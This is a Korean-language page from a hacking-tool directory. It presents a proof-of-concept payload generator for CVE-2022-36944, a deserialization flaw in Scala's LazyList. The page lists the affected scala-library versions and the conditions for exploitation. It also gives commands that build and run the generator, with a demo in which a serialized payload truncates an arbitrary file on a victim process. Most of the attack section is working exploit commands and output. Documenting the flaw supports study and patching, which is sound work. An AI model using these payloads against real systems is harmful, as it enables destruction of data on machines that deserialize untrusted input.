Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
lazylist-cve-poc — CVE-2022-36944 취약점 익스플로잇 PoC | Kitploit
도구/GitHubGitHub/yarocher/lazylist-cve-poc
Payload GenerationVulnerability AnalysisExploitationLearning & EducationBinary Exploitation
GitHubyarocher/lazylist-cve-poc

lazylist-cve-poc

CVE-2022-36944 취약점 익스플로잇 PoC

저장소 보기
111143년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-36944 페이로드 생성기

이 미니 프로젝트는 CVE-2022-36944 취약점의 개념 증명을 시연하기 위해 제작되었습니다. 이는 ysoserial과 유사하지만, LazyList 클래스를 사용하는 이 CVE에 대한 페이로드만 생성합니다.

빠른 FAQ

어떤 아티팩트가 취약점을 유발하나요?

org.scala-lang:scala-library 버전 2.13.x 중 2.13.9 미만

어떤 애플리케이션이 취약한가요?

애플리케이션이 취약해지려면 두 가지 조건이 결합되어야 합니다:

  • 애플리케이션의 클래스패스에 취약한 scala-library jar가 포함되어 있어야 함
  • ObjectInputStream#readObject()가 애플리케이션의 어딘가에서 결국 호출되고, 신뢰할 수 없는 데이터(공격자 제어)가 전달되어야 함

취약점은 어디서 수정되었나요?

scala PR 참조: #10118

빌드

mvn clean package

실행

다음 명령어는 피해자 시스템에서 임의의 파일을 자르는(truncate) 데 사용할 수 있는 페이로드를 stdout으로 덤프합니다:

mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="/file/to/truncate false"

데모

A) 파일을 통한 방법

  1. 내부에 데이터가 있는 테스트 파일을 준비합니다:
$ yes sometestdata > test_data
^C
$ head test_data 
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
  1. 페이로드를 생성하여 payload.ser 파일에 저장합니다:
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" > payload.ser
  1. 피해자 프로세스를 실행합니다 (ClassCastException이 예상됩니다):
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="payload.ser"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
  1. 피해자 파일이 잘렸는지 확인합니다:
$ head test_data 
$ 

B) stdin으로 파이프

2~3단계를 다음과 같이 결합할 수 있습니다 (Victim의 파일로 "-" 사용):

$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" | mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="-"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
도구 다운로드